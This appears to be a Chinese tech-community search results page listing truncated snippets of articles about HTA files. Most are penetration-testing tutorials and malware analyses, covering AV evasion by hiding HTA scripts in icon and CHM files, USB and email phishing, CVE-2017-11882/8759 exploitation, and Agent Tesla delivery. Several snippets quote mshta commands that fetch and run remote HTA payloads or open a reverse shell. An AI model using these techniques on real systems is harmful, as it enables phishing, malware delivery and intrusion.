首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

利用HTA文件绕过杀软及邮件钓⻥

0x01 基础 HTA是HTML Application的缩写,本⽂介绍HTA在内⽹渗透中的⼏种运⽤。...双击时,会弹出hta⽂件的框,有时候为了避免弹出这个框,可以在hta⽂件中添加样式: <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR...0x02 对HTA的⽂件的隐藏 由于MSHTA对不同后缀的hta⽂件处理有所差异,我们可以通过修改后缀名的⽅式来进⼀步隐藏我们的脚本。第⼀种常⻅的⽅式是将 .hta 修改为 .html 。...因此,需要做⼀些⼩优化: copy /b beauty.ico+test.hta test_with_beauty.htahta⽂件中需要加上: <HTA:APPLICATION icon="#".../b hello.chm+test.hta hello.chm 这样就实现了⽤户在点击时,在不影响原有程序的基础上执⾏我们的hta脚本。

1.9K10

HTA的简单应用

HTA简介:HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件没什么差别...下面是一个HTA的例子: <!...从上面的代码可以看出来,HTA与普通的网页结构差不多,所以设计出来很容易,当然HTA还有许多自己独特的属性,下面我们来看看这个文件: 1、    HTA对语法的要求比HTML还要松,甚至连...—example2.hta?  送别 王维 下马引君酒,问君何所之。 …… 注意:上面就是整个HTA文件的全部代码,运行看看,是不是很爽啊??...:) 2、    HTA的外观 可以用来设顶HTA应用程序的外观,如标题栏、边框大小等,必须放在中。 <!

93620
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    HTA芯片(学徒探索任务)

    前面我提到过[HTA-2_0] Affymetrix Human Transcriptome Array 2.0芯片的分析其实挺麻烦的,首先需要搞清楚下面3个平台的差异: GPL17586 [HTA...TP53基因上面的HTA芯片探针 如果具体看探针的坐标,如下: ?...如果以外显子为单位看表达差异 反正都是表达矩阵,以外显子为单位和基因为单位,理论是差不多啦,没有根据注释文件映射到基因名字之前,都是一个ID而已。...可惜的是,大多数情况下,真心想用好HTA芯片数据的小伙伴并不是购买服务的人,而是想挖掘它背后价值的。 ?...TAC软件 可以看到这个软件有一个探索可变剪切的模块,而且这个也的确是大量使用了HTA芯片的文章写作落脚点。

    95320

    使用hta操作nginx停止、重启

    用.net写一个windows应用程序,还是用hta处理呢,想了一下还是使用hta写了,虽然之前用.net写过类似的windows应用程序(选择指定目录,查找这个文件夹下所有execl中每一个sheet...用.hta有个问题就是在装有360的机器上会不停的访问是否要运行此应用程序,比较讨厌~(反正我机器啥“杀毒”的软件也没装) 初步有想法: 1、读取用户的hosts文件信息,查找文件中是否配置过指定的规则...hta运行效果如下: ?...,只需要加二行就OK了 ssi on; ssi_silent_errors on; 3、如果装有一些防护软件的机器上,在运行hta文件时需要允许它运行,不然没得完了。...总结一下,用到的技术:php、javascript、css、hta、batch(批处理)、nginx的配置、SSI,上面记录下的是在实现那个想法时遇到的一些问题,以及如何定位问题然后解决它的。

    1.8K10

    hta包装为exe发布

    hta在打开的时候,有时候会被杀毒软件拦截而不给执行,更重要的一点是通常都可以右击查看源代码,里面如果涉及到域名或者其它的一些细节就很容易被其它人了解。...网络上有一些hta转exe的,类似的软件基本上都是国外的,而且要付费,从一些乱七八糟的地方下载过“破解版”的用了一下,不是很好用,对hta支持比较差,对vbs可能会好很多,既然不好用那就只好自己动手了...很简单,主要的实现过程是:将hta作为资源添加至项目中,exe启动后读取资源文件,并写入本地磁盘,然后调用mshta命令启动hta,当hta被关闭时删除该文件。...读取资源 --> 写文件 --> 执行文件 --> 删除文件 {     Application.EnableVisualStyles();     Application.SetCompatibleTextRenderingDefault...string strSystemDisk = strSystemPath.Substring(0, 1);     string strHtaPath = strSystemDisk + ":\\temp.hta

    89420

    我有两把枪:Powershell + HTA

    银角大王 HTA hta格式,看上去一个陌生的后缀,但实际遨游网络的你天天都接触到,因为它也是网页格式的一种,类似于html/htm ,通过html语法编写内容。...答对了,确实类似于钓鱼,但是得补充一下,HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多,不但窗口界面跟其他软件相同,同时它也相应的具有类似于VB、C++编写的桌面程序的相同权限(读写文件...在实例hello.hta中的 是HTA的一些参数设置,设置详情见之前HTA相关内容链接。 已然有了HTA的完美辅助,如果加上Powershell的暴力输出呢?...:P 确实,一个hta后缀的文件,见都没见过呢,图标还是个执行文件,打开显示一个白板,十分可疑……!辣摸……这时候就要靠猴子派来的救兵辣!...而这个特点,在文件名中同样适用!

    1.9K80

    USB钓鱼几种方式总结。

    方式一:引诱目标点开“美图” 当目标点开美图(恶意LNK快捷方式文件:confidential.jpg.lnk),使目标认为他正在打开图像(confidential.jpg),HTA dropper 隐藏在快捷方式文件中...模板将创建一个VB代码,该代码将加载并删除“-embed”指定的文件,并用rundll32加载;-G是指生成hta文件 3.同样用macro_pack生成另外一个经过混淆的HTA payload,他将完成替换删除...如果你此时双击pic.hta,会生成wuyifan.jpg,但是此时pic.hta没有自删除 4.整合上述的两步形成一个自删除的HTA文件:打开pic.hta将AutoOpen函数名修改为AutoOpen2...模式,不能像上述方法与hta文件组合。...文件,运行: echo calc.exe | macro_pack.exe -t CMD -G calc.hta --unicode-rtlo=jpg 生成的文件名为calcath.jpg,实际上是calc

    1.3K10

    浅谈一下mshta在CVE-2017-11882里的命令构造

    所以在这里我就浅谈一下如何构造这个mshta命令,另外提一下hta文件在安全方面的一个应用。 mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件。...mshta执行.hta文件,是以当前用户权限执行,hta文件可以随便改后缀,也可以本地或远程执行,本地执行的时候,要记得带全路径名,否则会出错。...一、HTA文件 内嵌的html文件如何去除本地安全认证呢?...这样就不会弹阻止框了,可以干坏事了,1.hta代码如下: ? 二、如何写一个高效的下载执行过杀软的hta文件? 如果是下载执行的话,哪就很弱了。...hta文件里可以自由地写vbscript代码,所以我们的思路是可以把你的木马转换成base64格式也好,转换成16进制也好再转回来,hta只是访问了一个网页而已,但是已经把木马转到本地了,具体代码1.hta

    1.4K80

    Quantum 构建工具使用新的 TTP 投递 Agent Tesla

    【执行混淆代码】 【通过 MSHTA 执行远程服务器上的 HTA 文件HTA 文件包含多个千余行的垃圾 VBS 函数,其中只有一个与恶意行为有关。...通过命令 Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta来执行远程 HTA 文件。...【通过 LNK 执行 HTA 文件】 MSHTA 执行的 HTA 文件与之前感染链中使用的文件相同,加密数组转换为字符以形成可通过 Run 方法执行的 PowerShell 代码。...【HTA 文件解密 PowerShell 代码】 除了 Run() 方法之外,在某些情况下,HTA 文件利用 ShellExecute() 方法执行 PowerShell 代码,如下所示: 【通过 ShellExecute...HTA 生成工具】 用户输入传递给 HTA Builder 函数以构造 HTA 文件,如下所示: 【HTA 生成工具】 将此代码与之前分析的 HTA 代码比较,可以确定 Payload 是由 Quantum

    1.5K20

    疑似响尾蛇APT组织利用冠状病毒相关信息传播恶意lnk文件

    通过沙箱可发现,该样本是lnk文件,运行后将从远程下载hta文件执行 ? 可惜的是远程连接已经404了,没法继续分析后续。通过anyrun直接找样本分析的路子断了,再次尝试从VT获取一些样本信息。...进入anyrun可见该样本是一个hta文件,且其标题与lnk文件相同,且其网络行为中的域名也与lnk文件后续域名相同。因此可判定该样本即为lnk文件后续 ?...Hta文件内容如下 ? 该hta主要功能为解密加载一个.netdll. ? ? 解密出dll后,获取杀软信息 ?...加载dll,传入四个参数,分别是后续hta地址,传杀软信息的ur+杀软信息,诱饵pdf的内容,诱饵pdf的文件名 ? 之后该dll将释放诱饵文件,诱饵内容与巴基斯坦军队抗击疫情相关 ?...‘将再次从远程下载一个hta文件执行,但该链接目前又失效了,继续anyrun大法下载。 ? 下载回来的hta与之前的类似,仍是解密加载一个dll文件。加载后调用dll的work函数 ?

    95720

    Kali Linux Web渗透测试手册(第二版) - 5.8 - 使用XSS和Metasploit获取远程shell

    Windows7虚拟机; 实战演练 我们要做是用XSS使客户端的Windows7的浏览器打开并执行托管在Kali Linux上的恶意HTA文件。 1....注意服务器启动时给出的信息,Local IP给出了访问HTA文件的方式。...就可以使得用户接受不安全警告下载执行恶意文件: ?...9.当提示运行、保存或者取消时,选择运行HTA文件 10.现在切换回Kali,你就可以在控制台中看到Metasploit已经成功收到来自客户端的负载请求并且建立了Shell连接。 ?...我们刚才使用Metasploit生成恶意的HTA文件并开启本地服务来托管它,我们的恶意文件包含一个 反向shell,反向shell是一个程序,当受害者执行它时,它将连接到攻击者的服务器,而不是在受害者中打开一个端口来等待连接传入

    53320

    CVE-2017-11882复现及防御

    既然能够实现弹出,那我们可以构造执行 powershell 直接获取 msf 会话 深入利用 在利用前,先了解一下 htahta 文件使用 HTML 格式,它的程序码可以像 HTML 一样被编辑和检查...在 hta 文件中 VBScript 和 JavaScript 的程序码可以任意混合。HTA 虽然用 HTML、JS 和 CSS 编写,却比普通网页权限大得多。...它具有桌面程序的所有权限(读写文件、操作注册表等)。hta 本来就是被设计为桌面程序的。 1、利用 msf 生成利用的 powershell 脚本 ? ?...mshta 去执行链接中的 hta 嵌套的 VBS 代码,从而执行 powershell 命令,随便用一个浏览器打开链接,就可以下载到 test.hta文件内容如下: ?...在复现过程中,察觉到是使用 hta 进行命令执行利用,推测攻击机作为 hta_server,然后尝试在 msf 搜索 hta,发现一个模块的实现效果跟 PS_shell 一样,接下来开始演示一下: 1、

    1K00

    Windows文件传输及执行—mshta「建议收藏」

    取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一: C:\Users\\AppData\Local\Microsoft\Windows...Mshta下载&执行 mshta支持2种文件格式的执行,其中执行.sct文件的命令格式如下: mshta vbscript:Close(Execute("GetObject(""script:https...执行.hta文件的命令格式如下: mshta http://webserver/payload.hta  metasploit的exploit/windows/misc/hta_server支持.hta...文件的执行: use exploit/windows/misc/hta_server 配置对应的参数后,在目标主机cmd下执行: mshta http://192.168.49.160:8080/...c3a4XKrdsu3L.hta 在win7和win10测试,都可成功反弹shell:  Empire也支持.hta的payload: usestager windows/hta 然后在目标主机执行

    3.1K20

    CVE-2017-8759完美复现(另附加hta+powershell弹框闪烁解决方案)

    利用的文件: 本人整理的: https://github.com/Lz1y/CVE-2017-8759 文件分别来自: https://github.com/Voulnet/CVE-2017-8759-...Exploit-sample https://github.com/vysec/CVE-2017-8759 这次的攻击文件:cmd.hta exploit.txt blob.bin PS:cmd.hta...中嵌入了VBS脚本,可以根据自己的需求更改内容(可以使用powershell直接下载并运行木马,也可以使用Windows中的bitsadmin下载木马运行) 我整理的HTA文件已经处理过啦~不会有HTA...切记Mime设置为HTA,Launch 接着再来一次Attacks=>Web Drive-by=> HOST file ?...得到了session~ 因为修改了HTA部分,所以是不存在弹框闪烁的问题(可能会被杀软检测到),目前这个0day影响还是很大的。没有打补丁的小伙伴记得修复哦~ 动图(无弹框): ?

    1.1K100
    领券